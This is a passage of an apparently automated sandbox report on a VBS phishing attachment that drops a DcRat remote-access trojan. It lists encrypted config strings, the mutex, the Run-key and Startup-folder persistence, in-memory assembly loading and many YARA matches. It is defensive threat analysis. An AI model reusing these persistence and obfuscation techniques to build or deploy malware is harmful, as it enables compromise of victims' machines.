'Sb7k9N6y/mjln0+cqCNQvo00pCerPyhdvCCZIzPJia3lj82KZYQeECX3k++HZ8gO4e8gjBjgr2+5d1mjRmJUQQ==', '/Fpw2Tycm40na8g2y1lBcAMFaYxWmCKR6KfbuikP8qY4RKVl3XFrj5obCNRk4BcAPfbYgjynREIHRciyq+PR3w=='
Source: 17.0.InstallUtil.exe.400000.1.unpack, Client/Install/NormalStartup.cs Base64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA=='
Source: 17.2.InstallUtil.exe.400000.0.unpack, Client/Install/NormalStartup.cs Base64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA=='
Source: 17.2.InstallUtil.exe.400000.0.unpack, Client/Settings.cs Base64 encoded string: 'Zg9VSZv/vsUnEQBzhfXpKPjYm70KkS5MxCRhZ1CLxaONi86O1tioh7cto+j8y2tHB120cTLyZ51HkueXBxsY1A==', 'v23I0uaw1sk1B/UV7MF/i7PWa4pkjHGwD3HGXSar/bDyBGI64sWLOksmjWy56FKsz15Se74UdHLPfujhZYMKxg==', 'zJ/1sVpcObuNfLTrUkZTTh0ZZ7HsCe9LfsAJMBq5glbYy/Bo8lHq+irEJXxzSoyZEMMH32ZAIPgbMMutNwnn5Q==', 'qZK17jl/J4a8Q7oQLlEdW17aFbsly0z2BJF/eEtiuV/2JCpg+zSuK6y7vk86iUp/mO8wdvSbP6wHKhfkIu5t0UiFHk4hrr683x91+Aem184=', 'Uy3qA4XUoTvhzLn2xXYwE8q9FkOCN3aQpvfcYdG/H+f8v+XEnDM0YhpENrKWgLWddtEKdNAxt2VysNAb7olyKY7LrxU/GNx4Pv9cz7nzZNYWKWZYZZ/rkPFJp3wloY9XZl7JY1Y2HMJiZnuyJL+8NMwpoYiWQfTEXVCargNl8n4bBen17eB6rx/GidE5k3pE711DDJr6kz5v3TdgYv3CdBrrSDVbB933SLP83T2TWOGhB3+F7ATHxPYRUCtLUOnot/z8dlwQjW206agkbgvmoL6rSN9YsodPleYlNrUl9rXXigSDa55X70UlTmDwOUo4HmC7/xp0fBQ3jZcJ5XfMVhQjfDJL73S9pUd/fw2pSeHLFoZSewdfvZi96x5sGBro2DGC1XuXt2Mw2QnTuFYumY2EheX8gL0YrlgO4GzqrrTtSvAuCvzoQQiDAvS72FmEAevMW2fmUdEcv3CXsE3eLfYlzxHsQByU8uZYuVD2oC536lcBVBVbZaLwZHGKB+DQrJv3MFfgwGkR05TFDmU5ixHRPd+uV+ZkKaxwHQCZG1svcq/7OaOCsy1HouuH64AQql+f1bTNO+thWbEI7uXSY6tBHbG1NurTlvZD/RnjoIdaE7q0CvrPSeHPekVYDUEO1ijAbCNrXzq2u5t5TE+ZTwyvqtMZWRhy89TOOzKWZXNy9TcHmkOAy+jBe8e+sXGSUO0u5iqhbaw3sRXtamgiamhoqN8hTdOz+vfJDC8A7zCndUdKUfoAQ7B2gIqQ15R7PvpwrZpXL323GesDZDaEtCzqDcydI5UKH8fMZyB+TrHKqFplIkYI9i3HTw7/fvZRdIz33O1eXNx7jreoRxVT99QEx1ChxMlkSni44R7Dn75VsRwW+mxXoX/aJ1X2VPCKWW7NYdVu43pnRZqXqnAbmAe02orAx2fsJJ+a5ya5XKFs+C/FDHeXd81WpwZkXBZFvdS+okigOyS5ZokUz5eMgo35wHhQFzrLAdGxP+J714yIfSvS+rUlOYYXQgdKpTIM9r6/tQoRhRF/iB+WgYBuMrKSfQ5BZRV68Xn2ihArOnI3EUFGnlYynk3RcH95w2LC', 's4eubzQAqwdqZLczo80oYV+6aCOh7nxDIxvmJ9WhBE6RFSxYSwBkQghrXU9kGnOK/REsRpm+BzllXO4eNfUCQPNl8AcQOPWz3R/nZYFUtob6RnDZYK3wTmfYpaQhzHICQQtt6u7KmjUJYTWDIFpsU7UMrEWFJnQJ+l1uS73RR9N6R+FRwmNCVdhewgMCetk+zRXEc1snGJTltcCPW3NU4DNyfSubi8qJkEdL1619D94HVZGAREH1A2LgGBclrTXO1pzILZ/E0DnUewkwr+MNxhMAF44NGHV/7rsdeC5OiXY=', 'zViY6nboISUvBmx5Joto+trVzMpeLLRgMZpFO9m57Mi49ucYpxCH88awKiQaDEcjveaXDJBt0rcy/llBm5rtUg==', 'M72wAaVCyHpUE0p/u2OgzlNEXrDLNJODlaMVbr2TWtwW/kAW5rxYap/mHuiOQvxbAGq9KA1kPWuS051TZkMy9w==', 'Sb7k9N6y/mjln0+cqCNQvo00pCerPyhdvCCZIzPJia3lj82KZYQeECX3k++HZ8gO4e8gjBjgr2+5d1mjRmJUQQ==', '/Fpw2Tycm40na8g2y1lBcAMFaYxWmCKR6KfbuikP8qY4RKVl3XFrj5obCNRk4BcAPfbYgjynREIHRciyq+PR3w=='
Source: 17.0.InstallUtil.exe.400000.0.unpack, Client/Install/NormalStartup.cs Base64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA=='
Source: 17.0.InstallUtil.exe.400000.0.unpack, Client/Settings.cs Base64 encoded string: 'Zg9VSZv/vsUnEQBzhfXpKPjYm70KkS5MxCRhZ1CLxaONi86O1tioh7cto+j8y2tHB120cTLyZ51HkueXBxsY1A==', 'v23I0uaw1sk1B/UV7MF/i7PWa4pkjHGwD3HGXSar/bDyBGI64sWLOksmjWy56FKsz15Se74UdHLPfujhZYMKxg==', 'zJ/1sVpcObuNfLTrUkZTTh0ZZ7HsCe9LfsAJMBq5glbYy/Bo8lHq+irEJXxzSoyZEMMH32ZAIPgbMMutNwnn5Q==', 'qZK17jl/J4a8Q7oQLlEdW17aFbsly0z2BJF/eEtiuV/2JCpg+zSuK6y7vk86iUp/mO8wdvSbP6wHKhfkIu5t0UiFHk4hrr683x91+Aem184=', 'Uy3qA4XUoTvhzLn2xXYwE8q9FkOCN3aQpvfcYdG/H+f8v+XEnDM0YhpENrKWgLWddtEKdNAxt2VysNAb7olyKY7LrxU/GNx4Pv9cz7nzZNYWKWZYZZ/rkPFJp3wloY9XZl7JY1Y2HMJiZnuyJL+8NMwpoYiWQfTEXVCargNl8n4bBen17eB6rx/GidE5k3pE711DDJr6kz5v3TdgYv3CdBrrSDVbB933SLP83T2TWOGhB3+F7ATHxPYRUCtLUOnot/z8dlwQjW206agkbgvmoL6rSN9YsodPleYlNrUl9rXXigSDa55X70UlTmDwOUo4HmC7/xp0fBQ3jZcJ5XfMVhQjfDJL73S9pUd/fw2pSeHLFoZSewdfvZi96x5sGBro2DGC1XuXt2Mw2QnTuFYumY2EheX8gL0YrlgO4GzqrrTtSvAuCvzoQQiDAvS72FmEAevMW2fmUdEcv3CXsE3eLfYlzxHsQByU8uZYuVD2oC536lcBVBVbZaLwZHGKB+DQrJv3MFfgwGkR05TFDmU5ixHRPd+uV+ZkKaxwHQCZG1svcq/7OaOCsy1HouuH64AQql+f1bTNO+thWbEI7uXSY6tBHbG1NurTlvZD/RnjoIdaE7q0CvrPSeHPekVYDUEO1ijAbCNrXzq2u5t5TE+ZTwyvqtMZWRhy89TOOzKWZXNy9TcHmkOAy+jBe8e+sXGSUO0u5iqhbaw3sRXtamgiamhoqN8hTdOz+vfJDC8A7zCndUdKUfoAQ7B2gIqQ15R7PvpwrZpXL323GesDZDaEtCzqDcydI5UKH8fMZyB+TrHKqFplIkYI9i3HTw7/fvZRdIz33O1eXNx7jreoRxVT99QEx1ChxMlkSni44R7Dn75VsRwW+mxXoX/aJ1X2VPCKWW7NYdVu43pnRZqXqnAbmAe02orAx2fsJJ+a5ya5XKFs+C/FDHeXd81WpwZkXBZFvdS+okigOyS5ZokUz5eMgo35wHhQFzrLAdGxP+J714yIfSvS+rUlOYYXQgdKpTIM9r6/tQoRhRF/iB+WgYBuMrKSfQ5BZRV68Xn2ihArOnI3EUFGnlYynk3RcH95w2LC', 's4eubzQAqwdqZLczo80oYV+6aCOh7nxDIxvmJ9WhBE6RFSxYSwBkQghrXU9kGnOK/REsRpm+BzllXO4eNfUCQPNl8AcQOPWz3R/nZYFUtob6RnDZYK3wTmfYpaQhzHICQQtt6u7KmjUJYTWDIFpsU7UMrEWFJnQJ+l1uS73RR9N6R+FRwmNCVdhewgMCetk+zRXEc1snGJTltcCPW3NU4DNyfSubi8qJkEdL1619D94HVZGAREH1A2LgGBclrTXO1pzILZ/E0DnUewkwr+MNxhMAF44NGHV/7rsdeC5OiXY=', 'zViY6nboISUvBmx5Joto+trVzMpeLLRgMZpFO9m57Mi49ucYpxCH88awKiQaDEcjveaXDJBt0rcy/llBm5rtUg==', 'M72wAaVCyHpUE0p/u2OgzlNEXrDLNJODlaMVbr2TWtwW/kAW5rxYap/mHuiOQvxbAGq9KA1kPWuS051TZkMy9w==', 'Sb7k9N6y/mjln0+cqCNQvo00pCerPyhdvCCZIzPJia3lj82KZYQeECX3k++HZ8gO4e8gjBjgr2+5d1mjRmJUQQ==', '/Fpw2Tycm40na8g2y1lBcAMFaYxWmCKR6KfbuikP8qY4RKVl3XFrj5obCNRk4BcAPfbYgjynREIHRciyq+PR3w=='
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7140:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2796:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Mutant created: \Sessions\1\BaseNamedObjects\DcRatMutex_qwqdanchun
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\Re-RFQ - PN List.vbs"
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: :C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.pdbXP source: powershell.exe, 00000006.00000002.503794683.000002464FA26000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.pdb@ source: powershell.exe, 00000006.00000002.501027753.000002464F879000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: 14.2.InstallUtil.exe.400000.0.unpack, Client/Connection/ClientSocket.cs .Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 14.0.InstallUtil.exe.400000.1.unpack, Client/Connection/ClientSocket.cs .Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 14.0.InstallUtil.exe.400000.4.unpack, Client/Connection/ClientSocket.cs .Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 14.0.InstallUtil.exe.400000.0.unpack, Client/Connection/ClientSocket.cs .Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 14.0.InstallUtil.exe.400000.3.unpack, Client/Connection/ClientSocket.cs .Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 14.0.InstallUtil.exe.400000.2.unpack, Client/Connection/ClientSocket.cs .Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 17.0.InstallUtil.exe.400000.2.unpack, Client/Connection/ClientSocket.cs .Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 17.0.InstallUtil.exe.400000.3.unpack, Client/Connection/ClientSocket.cs .Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 17.0.InstallUtil.exe.400000.4.unpack, Client/Connection/ClientSocket.cs .Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 17.0.InstallUtil.exe.400000.1.unpack, Client/Connection/ClientSocket.cs .Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 17.2.InstallUtil.exe.400000.0.unpack, Client/Connection/ClientSocket.cs .Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 17.0.InstallUtil.exe.400000.0.unpack, Client/Connection/ClientSocket.cs .Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FFEBC8B788A push eax; ret 6_2_00007FFEBC8B788B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FFEBC8B0D97 pushad ; ret 6_2_00007FFEBC8B0D98
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FFEBC8B7717 push ebx; retf 6_2_00007FFEBC8B771A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FFEBC983CFF push edi; iretd 6_2_00007FFEBC983D06
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FFEBC980C92 push ecx; iretd 6_2_00007FFEBC980C93
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.cmdline Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

Boot Survival

barindex
Source: Yara match File source: 11.2.powershell.exe.1d38e3da290.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.powershell.exe.1d38e8b7a20.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.powershell.exe.1d38e8932f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.powershell.exe.1d38e8932f8.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.powershell.exe.2464fbd9680.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.powershell.exe.1d38e8aba40.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.powershell.exe.2464fbc0f38.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.powershell.exe.1d38e3e6138.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.powershell.exe.2464fbe5660.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.powershell.exe.2464f298700.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.powershell.exe.1d38e8b7a20.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.powershell.exe.2464fbc0f38.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.powershell.exe.1d38e50f5c8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.powershell.exe.2464f298700.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.powershell.exe.1d38e8aba40.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.powershell.exe.1d38e3e6138.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.powershell.exe.1d38e50f5c8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.powershell.exe.2464fbe5660.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.powershell.exe.1d38e3da290.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.powershell.exe.2464fbd9680.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000000.482202249.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.522369238.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.521087043.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.909303813.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.482568834.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.521388482.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.508035247.000002464FAFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.482880549.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.508351680.000002464FBD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.483188159.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.535314776.000001D38E80B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.532336594.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.532881754.000001D38E3D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.522066240.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.535498230.000001D38E8A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.492233928.000002464EE2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 924, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7116, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 6428, type: MEMORYSTR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemLogin.vbs Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemLogin.vbs Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemLogin.vbs Jump to behavior
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
